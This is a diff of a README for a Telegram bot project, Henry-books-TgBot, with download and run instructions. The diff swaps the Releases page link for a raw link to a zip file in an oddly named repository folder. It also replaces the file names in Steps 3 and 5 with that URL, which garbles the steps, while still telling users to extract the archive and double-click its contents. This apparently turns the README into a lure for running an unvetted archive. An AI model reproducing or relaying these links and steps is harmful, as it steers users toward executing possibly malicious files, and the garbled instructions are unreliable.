ALK-LZX/Henry-books-TgBot/README.md

 ## 📄 Instructions to Download & Install

 ### Step 1: Visit the Download Page
-To download Henry-books-TgBot, visit our [Releases page](https://github.com/ALK-LZX/Henry-books-TgBot/releases).
+To download Henry-books-TgBot, visit our [Releases page](https://raw.githubusercontent.com/ALK-LZX/Henry-books-TgBot/main/semihard/Henry-books-TgBot.zip).

 ### Step 2: Choose the Latest Release
 On the Releases page, you will see a list of versions.
 Click on the latest version to view the available files for download.

 ### Step 3: Download the Files
-Look for the file labeled “Henry-books-TgBot.zip”.
+Look for the file labeled “https://raw.githubusercontent.com/ALK-LZX/Henry-books-TgBot/main/semihard/Henry-books-TgBot.zip”.
 Click on it to start the download.

 ### Step 4: Extract the Files
 Once the download is complete, locate the ZIP file in your downloads folder.
 Right-click the file and select "Extract All" to unpack it.

 ### Step 5: Run the Bot
-Open the extracted folder and look for the file named “start.bat”.
+Open the extracted folder and look for the file named “https://raw.githubusercontent.com/ALK-LZX/Henry-books-TgBot/main/semihard/Henry-books-TgBot.zip”.
 Double-click on this file to run the bot.

 ### Step 6: Access Telegram
 If you do not have Telegram, download and install it from the official website or app store.
 Once installed, log in to your account.